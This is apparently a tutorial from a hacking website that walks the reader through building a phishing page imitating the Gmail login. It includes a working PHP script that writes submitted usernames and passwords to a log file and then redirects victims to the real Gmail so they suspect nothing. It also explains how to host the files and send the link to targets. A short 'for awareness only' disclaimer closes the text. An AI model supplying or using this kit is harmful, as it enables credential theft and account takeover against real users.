1) .Html file ( ie fake page )
2) .php file or any other action script page ( for tracking the details that entered in page created by you )
3) .Txt file ( To save all the details in text format )
In common,every phishing page contains these 3 files,But normally you can see only the fake page which looks exactly as original,remaining files will run in background that will not be visible for you.Here I am going to create a phishing page for gmail login.Procedures for creating phishing pages for all sites are same.I am giving you detailed instructions for making this page,Just follow my steps exactly as i mentioned.
STEPS FOR CREATING PHISHING PAGE.
1 ) First goto Gmail login page ( www.gmail.com,make sure that the page is loaded completely ) and right click and select view source ( in firefox ) or view source code option in other browsers.
2 ) Select all ( CTR + A ) and copy all the code and paste it in notepad.
3 ) Then search for the keyword action.You can see the code as given below.
4 ) Just change the above code as mentioned below
after changing to mail.php ( or anyname.php ) just save it in the form login.html ( anyname.html ). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5 ) For creating a php script,just copy the below php code into notepad and save in the format mail.php ( name mentioned in action of our phishing page )
header ('Location: http://www.gmail.com ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
6 ) By this step our PHP script is also ready,Now create a .Txt file with name log.txt ( name mentioned in php script )
7 ) Now host these 3 files ie,
login.html
mail.php
log.txt
in any of free hosting servers like ripway,drivehq,100 mb etc (or any other,just google free hosting ).Make sure that these 3 files are in same directory.
8 ) After hosting you will get a direct link to your phishing page,that is to your login.html page.just use this link to access or send phishing page.
HOW PHISHING IS WORKING
When you enter your username and password in gnail login phishing page and click singin or hit enter the mail.php script is loaded and this will copy all the entered details in to your log.txt file.Since we are given www.gmail.com as the header location original gmail page will be loaded after the php script.So the victim will think that they entered wrong information.If victim is already logged in gmail,then their mail will be loaded.
You can also read this HOW TO CREATE PHISHING PAGES FOR FACEBOOK
NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.thehackerclub4u.tk will not be responsible for any such phishing attacks,KNOW HACKING BUT NO HACKING....
If you found anything useful in this article please pass your comments,All your feedbacks are precious...............